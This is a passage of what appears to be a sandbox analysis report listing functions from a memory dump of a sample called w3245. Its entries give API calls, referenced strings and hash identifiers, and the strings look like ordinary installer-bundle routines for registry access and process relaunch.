                                                                                                                                                              • Instruction Fuzzy Hash: 5AA13576A0078A9FDB218F28C8817BEBBA5FF15310F1441ADE6959B382D63C9D41C761
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen
                                                                                                                                                              • String ID: dlutil.cpp
                                                                                                                                                              • API String ID: 1659193697-2067379296
                                                                                                                                                              • Opcode ID: 70f976240f339c7688e0cf9b1fed9b634d130e17fd13fc20e5da12a62e6424ff
                                                                                                                                                              • Instruction ID: b435e429b8aa1b903716982c318b25f1790af98fc8a9670865c2c54fa794f424
                                                                                                                                                              • Opcode Fuzzy Hash: 70f976240f339c7688e0cf9b1fed9b634d130e17fd13fc20e5da12a62e6424ff
                                                                                                                                                              • Instruction Fuzzy Hash: A751907290162AEBDB219FA58C849AFBBB9FF88710F154114FD00F7290DB75DD518BA0
                                                                                                                                                              APIs
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,007F2444,00000000,00000000,007F3479,?,007F3479,?,00000001,007F2444,ECE85006,00000001,007F3479,007F3479), ref: 007F9278
                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 007F9301
                                                                                                                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 007F9313
                                                                                                                                                              • __freea.LIBCMT ref: 007F931C
                                                                                                                                                                • Part of subcall function 007F521A: HeapAlloc.KERNEL32(00000000,?,?,?,007F1F87,?,0000015D,?,?,?,?,007F33E0,000000FF,00000000,?,?), ref: 007F524C
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ByteCharMultiWide$AllocHeapStringType__freea
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 573072132-0
                                                                                                                                                              • Opcode ID: f1bbe16b1c1403778e913b235738323dfb78927efadf9ddd084b11800a61fa2b
                                                                                                                                                              • Instruction ID: 95e840ba23279a248b6da7f9471f9cb12f000aeba7b7b36f887e419e509acbc2
                                                                                                                                                              • Opcode Fuzzy Hash: f1bbe16b1c1403778e913b235738323dfb78927efadf9ddd084b11800a61fa2b
                                                                                                                                                              • Instruction Fuzzy Hash: 1631AD32A0020AEBDB249F64CC85EBE7BA5EF40310F044128FE04D7291EB39CD91CB90
                                                                                                                                                              APIs
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00000000,?,007C5552,?,?,?,?,?,?), ref: 007C4FFE
                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,007C5552,?,?,?,?,?,?), ref: 007C5012
                                                                                                                                                              • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,007C5552,?,?), ref: 007C5101
                                                                                                                                                              • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,007C5552,?,?), ref: 007C5108
                                                                                                                                                                • Part of subcall function 007C1161: LocalFree.KERNEL32(?,?,007C4FBB,?,00000000,?,007C5552,?,?,?,?,?,?), ref: 007C116B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3671900028-0
                                                                                                                                                              • Opcode ID: a516008c6d87364c9a456b70076a4b523d4247d8311f10418b714fc9bb5c7dab
                                                                                                                                                              • Instruction ID: 0d5c6338a114fa1ac20df0979e20294b9050bf2ede240b2e3a52feed7d5154fa
                                                                                                                                                              • Opcode Fuzzy Hash: a516008c6d87364c9a456b70076a4b523d4247d8311f10418b714fc9bb5c7dab
                                                                                                                                                              • Instruction Fuzzy Hash: 1341AA71500B05ABDA71EBB4C88EF9B73ECAF05340F44092DB6AAD3051EB39F5858B65
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 007CF96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,007C4CA5,?,?,00000001), ref: 007CF9BC
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 007C4D0C
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 007C4CF6
                                                                                                                                                              • Failed to get current process path., xrefs: 007C4CCA
                                                                                                                                                              • Unable to get resume command line from the registry, xrefs: 007C4CAB
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Close$Handle
                                                                                                                                                              • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                                                                                                                              • API String ID: 187904097-642631345
                                                                                                                                                              • Opcode ID: e0f2288688d9ddca5e40584c403ed82fef55d6484e9864056b53c1d9fd0e752d
                                                                                                                                                              • Instruction ID: 1ce6ab6fecbf513f550920714110ee6879f37806b3d06b995c429f223dd78dd7
                                                                                                                                                              • Opcode Fuzzy Hash: e0f2288688d9ddca5e40584c403ed82fef55d6484e9864056b53c1d9fd0e752d
                                                                                                                                                              • Instruction Fuzzy Hash: EF116D71D01518BACF22AB98DC16E9EBBB8FF50721B10419EF911E2250DB358E10AA91
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007F8A56,00000000,00000000,?,007F8859,007F8A56,00000000,00000000,00000000,?,007F8A56,00000006,FlsSetValue), ref: 007F88E4
                                                                                                                                                              • GetLastError.KERNEL32(?,007F8859,007F8A56,00000000,00000000,00000000,?,007F8A56,00000006,FlsSetValue,00822404,0082240C,00000000,00000364,?,007F6230), ref: 007F88F0
                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,007F8859,007F8A56,00000000,00000000,00000000,?,007F8A56,00000006,FlsSetValue,00822404,0082240C,00000000), ref: 007F88FE
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3177248105-0
                                                                                                                                                              • Opcode ID: ba587f30769088c57eccb5296c5f29d2a5cd77e7cacd9c230d320942d13d66fd
                                                                                                                                                              • Instruction ID: 6484c44963a09af80f52a609124aaf02cab1b81c51eae38c652aa2249d827ab8
                                                                                                                                                              • Opcode Fuzzy Hash: ba587f30769088c57eccb5296c5f29d2a5cd77e7cacd9c230d320942d13d66fd
                                                                                                                                                              • Instruction Fuzzy Hash: 0301D43274122AABCB618B699C44A7B7798FF15BA17210620FA16E3340DB64EC0187E2
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,007F1AEC,00000000,80004004,?,007F1DF0,00000000,80004004,00000000,00000000), ref: 007F6162
                                                                                                                                                              • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 007F61CA
                                                                                                                                                              • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 007F61D6
                                                                                                                                                              • _abort.LIBCMT ref: 007F61DC
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLast$_abort
• String ID:
• API String ID: 88804580-0
• Opcode ID: 62989ef33f92bb6866c6b7cd4a298bad9442596ac89606089264d8a9debd5ba5
• Instruction ID: 10250caf3256716d53524d25e64dec97ff4cc2ddd1623804d82ebb8d8c407c70
• Opcode Fuzzy Hash: 62989ef33f92bb6866c6b7cd4a298bad9442596ac89606089264d8a9debd5ba5
• Instruction Fuzzy Hash: 3FF0C836104E1DE7C2223335AC0EB3F275AAFC1771B250125FB1496393FF2C98024122
APIs
• EnterCriticalSection.KERNEL32(?), ref: 007C7441
• LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 007C74A8
Strings
• Failed to get value as numeric for variable: %ls, xrefs: 007C7497
• Failed to get value of variable: %ls, xrefs: 007C747B
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
• API String ID: 3168844106-4270472870
• Opcode ID: 5bbc3e09601db27a2827090e4c18c1ea6371c4fa58a17d15e85241b6e28596a6
• Instruction ID: f927198871a16caf2115bb63347db55ec62c3ab6c25808095f6a93a0d4553438
• Opcode Fuzzy Hash: 5bbc3e09601db27a2827090e4c18c1ea6371c4fa58a17d15e85241b6e28596a6
• Instruction Fuzzy Hash: 20012972945168EBCB195F54CC09F9A7F64AF04761F008169FC04A6261CB3A9E50AA94
APIs
• EnterCriticalSection.KERNEL32(?), ref: 007C75B6
• LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 007C761D
Strings
• Failed to get value of variable: %ls, xrefs: 007C75F0
• Failed to get value as version for variable: %ls, xrefs: 007C760C
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
• API String ID: 3168844106-1851729331
• Opcode ID: f1c399e3256da60ee45ebf529665fcf5b80d5af8a5b09c701fefbf4a4512e704
• Instruction ID: ac2f7833e610321104953a49c047125d9ef971751a773d03eae56ff64feb6ee0
• Opcode Fuzzy Hash: f1c399e3256da60ee45ebf529665fcf5b80d5af8a5b09c701fefbf4a4512e704
• Instruction Fuzzy Hash: 14019A32904528EBCF165F88CC09F9E3B24FF10360F004128FC04AA261DB3A9E60EBD4
APIs
• EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,007C9897,00000000,?,00000000,00000000,00000000,?,007C96D6,00000000,?,00000000,00000000), ref: 007C7545
• LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,007C9897,00000000,?,00000000,00000000,00000000,?,007C96D6,00000000,?,00000000), ref: 007C759B
Strings
• Failed to get value of variable: %ls, xrefs: 007C756B
• Failed to copy value of variable: %ls, xrefs: 007C758A
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CriticalSection$EnterLeave
• String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
• API String ID: 3168844106-2936390398
• Opcode ID: c94321dfc4fc9c0738c2957ef2ac546e03dbe6f5a283471cca078e6ccf83cee6
• Instruction ID: 098802f4a3ef46be11e330258f14d9926880781e627b45e41226f08c0de09744
• Opcode Fuzzy Hash: c94321dfc4fc9c0738c2957ef2ac546e03dbe6f5a283471cca078e6ccf83cee6
• Instruction Fuzzy Hash: 91F03176945228FBCF125F54DC09E9E7B68FF14361F008158FD14A6260C73A9E61ABD4
APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 007EE788
• GetCurrentThreadId.KERNEL32 ref: 007EE797
• GetCurrentProcessId.KERNEL32 ref: 007EE7A0
• QueryPerformanceCounter.KERNEL32(?), ref: 007EE7AD
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
• Opcode ID: 6e525f4f5dcc009ce9424a2a236df682e9da822a035f4309179150cc8ec92842
• Instruction ID: edde88bfb86fcd925572533e6e30258cd4f48ea85d314fa153cae579502903f4
• Opcode Fuzzy Hash: 6e525f4f5dcc009ce9424a2a236df682e9da822a035f4309179150cc8ec92842
• Instruction Fuzzy Hash: 1FF04D71C1120DEBCB04DBB4D949A9EBBF8FF18315F614895A415E7210E734AB049B61
APIs
• RegCloseKey.ADVAPI32(00000000), ref: 00800DD7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Close
• String ID: regutil.cpp
• API String ID: 3535843008-955085611
• Opcode ID: ac38fc326cbe18f9d5adb19510f7b6a9f1c07fa63f603a0d8c7d63c58b56b045
• Instruction ID: fddb0fc37a7f77419eaaf072dd40665c54b0a2cec84c23ab7b393f097577b774
• Opcode Fuzzy Hash: ac38fc326cbe18f9d5adb19510f7b6a9f1c07fa63f603a0d8c7d63c58b56b045
• Instruction Fuzzy Hash: BE41B032D0152AEBEBB18AD4CC04BAE7761FB10760F258365BC14EA2D0D7359E40AFA1
APIs
  • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
• RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 008048FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: CloseOpen
• String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
• API String ID: 47109696-3023217399
• Opcode ID: 00c9cc2f72c7150e02e615bdc4f9fc1b39d51de7909f52e05e71d8b25e3ec2f9
• Instruction ID: 72bb4c0029ed7d2fba6ca1d58de3122031f78c0978a116f86bc37cdecf3cf039
• Opcode Fuzzy Hash: 00c9cc2f72c7150e02e615bdc4f9fc1b39d51de7909f52e05e71d8b25e3ec2f9
• Instruction Fuzzy Hash: 37418CB5E40159EFCB60DF98CC81AAEBBB5FB44B10F1594B9EA00E7291DB319E40DB50
APIs
• RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0080112B
• RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00801163
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: QueryValue
• String ID: regutil.cpp
• API String ID: 3660427363-955085611
• Opcode ID: d86b3986777e784a169cc478dcf3ea2226778380234deb6a7a1172d9b23f1ed9
• Instruction ID: 139a84241c61ad773102ac2e354c6628b83a597751f7b14212890d11d8e38bd9
• Opcode Fuzzy Hash: d86b3986777e784a169cc478dcf3ea2226778380234deb6a7a1172d9b23f1ed9
• Instruction Fuzzy Hash: EA417132D0112AFBDF259F94CC49AAEBBB9FF04760F14816DEA10E7291D7319E119B90
APIs
• WideCharToMultiByte.KERNEL32(0080B518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 007F67A3
• GetLastError.KERNEL32 ref: 007F67BF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ByteCharErrorLastMultiWide
• String ID: comres.dll
• API String ID: 203985260-246242247
• Opcode ID: 28be490bb12d6689ecb44dbe07bf1361fa8c7482afa7cd560887f1f40f7818a1
• Instruction ID: dc1cb62ba719c64744a87286bf2873c2eac659a278deb9d72da2beeafacbf73e
• Opcode Fuzzy Hash: 28be490bb12d6689ecb44dbe07bf1361fa8c7482afa7cd560887f1f40f7818a1
• Instruction Fuzzy Hash: 5231F63560021DEBCB21BF65C889ABB7B68AF41764F140165FB248B391EB78CD00C7B1
APIs
  • Part of subcall function 00808E44: lstrlenW.KERNEL32(00000100,?,?,?,00809217,000002C0,00000100,00000100,00000100,?,?,?,007E7D87,?,?,000001BC), ref: 00808E69
• RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0080B500,wininet.dll,?), ref: 0080907A
• RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,0080B500,wininet.dll,?), ref: 00809087
  • Part of subcall function 00800F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
  • Part of subcall function 00800E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,007E8E1B), ref: 00800EAA
  • Part of subcall function 00800E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,007E8E1B,00000000), ref: 00800EC8
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Close$EnumInfoOpenQuerylstrlen
• String ID: wininet.dll
• API String ID: 2680864210-3354682871
• Opcode ID: b199e057790f1fdacf2dedab462a6aa9d32ddd43359cf3e01911f0ca6ccb5acc
• Instruction ID: f41566b149fb768a78f7d2f3740dbf9e9ba53d7b26724c463f32415279959f9a
• Opcode Fuzzy Hash: b199e057790f1fdacf2dedab462a6aa9d32ddd43359cf3e01911f0ca6ccb5acc
• Instruction Fuzzy Hash: B9311932C0152AEFCF61AFA8CD419AEBB79FF04710F514179EA50B61A2C7314E509B91
APIs
  • Part of subcall function 00808E44: lstrlenW.KERNEL32(00000100,?,?,?,00809217,000002C0,00000100,00000100,00000100,?,?,?,007E7D87,?,?,000001BC), ref: 00808E69
• RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00809483
• RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 0080949D
  • Part of subcall function 00800BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,007D061A,?,00000000,00020006), ref: 00800C0E
  • Part of subcall function 008014F4: RegSetValueExW.ADVAPI32(00020006,00810D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,007CF335,00000000,?,00020006), ref: 00801527
  • Part of subcall function 008014F4: RegDeleteValueW.ADVAPI32(00020006,00810D10,00000000,?,?,007CF335,00000000,?,00020006,?,00810D10,00020006,00000000,?,?,?), ref: 00801557
  • Part of subcall function 008014A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,007CF28D,00810D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008014BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: Value$Close$CreateDeletelstrlen
• String ID: %ls\%ls
• API String ID: 3924016894-2125769799
• Opcode ID: 19b9a1f6018913027cfc03dea5f05e68e7b33a1c3b69888e19f5606b3546f556
• Instruction ID: 7c16d72be9f2e8d03d992db2ab00c1cbed83bd9b385300dc3cf631584d7d5834
• Opcode Fuzzy Hash: 19b9a1f6018913027cfc03dea5f05e68e7b33a1c3b69888e19f5606b3546f556
• Instruction Fuzzy Hash: 40313872C0152EBFCF629F94CC4189EBBB9FF04320B41816AF954A6262D7318E11EB95
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: _memcpy_s
• String ID: crypt32.dll$wininet.dll
• API String ID: 2001391462-82500532
• Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
• Instruction ID: 82d6d8f60b8d5dedf09074c6f90b0ff95c2595424773ca97d58e95aec2fe0f51
• Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
• Instruction Fuzzy Hash: E2115171600219ABCB08DF19CD85E9FBF69EF95354B14C12EFC058B311D275EA20CAE0
APIs
